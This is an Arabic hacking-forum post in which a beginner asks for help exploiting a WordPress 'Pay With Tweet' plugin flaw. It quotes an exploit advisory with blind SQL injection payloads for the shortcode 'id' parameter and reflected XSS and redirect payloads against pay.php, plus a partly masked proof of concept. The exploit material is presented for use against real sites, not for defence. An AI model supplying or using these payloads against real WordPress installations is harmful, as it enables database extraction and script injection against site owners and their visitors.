عدد النقاط : 10
الســــــــلآم عليــــــكم ورحمـــة الله إخــــواني العنـــاكب المـــرجو مســاعدتي // في إستغلال هــذه الثغـــرة / انـا لم أفــهم عليــها لآنــي مبتدأ. اقتباس # Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities # Date: 01/06/2012 # Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/) # Software Link: http://downloads.wordpress.org/plugi...-tweet.1.1.zip # Version: 1.1 1) Blind SQL Injection in shortcode: Short code parameter 'id' is prone to blind sqli, you need to be able to write a post/page to exploit this: [paywithtweet id="1' AND 1=2"] [paywithtweet id="1' AND 1=1"] 2) Multiple XSS in pay.php http://target.com/wp-content/plugins...et.php/pay.php After connecting to twitter: ?link=&22></input>[XSS] After submitting the tweet: ?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS] The final download link will be replaced with [REDIRECT-TO-URL] POC: pay.php?link=%22></input>***************(********.******)</script>&title=***************(********.******)</script>&dl=http://brindi.si%27">***************(********.******)</script> وشكـــرا للجميـع المصدر: :: vBspiders Professional Network ::lshu]m td hsjyghg eyvm Wp !
lshu]m td hsjyghg eyvm Wp !
http://www.qzal.net/01/2013-01/13607005701.jpg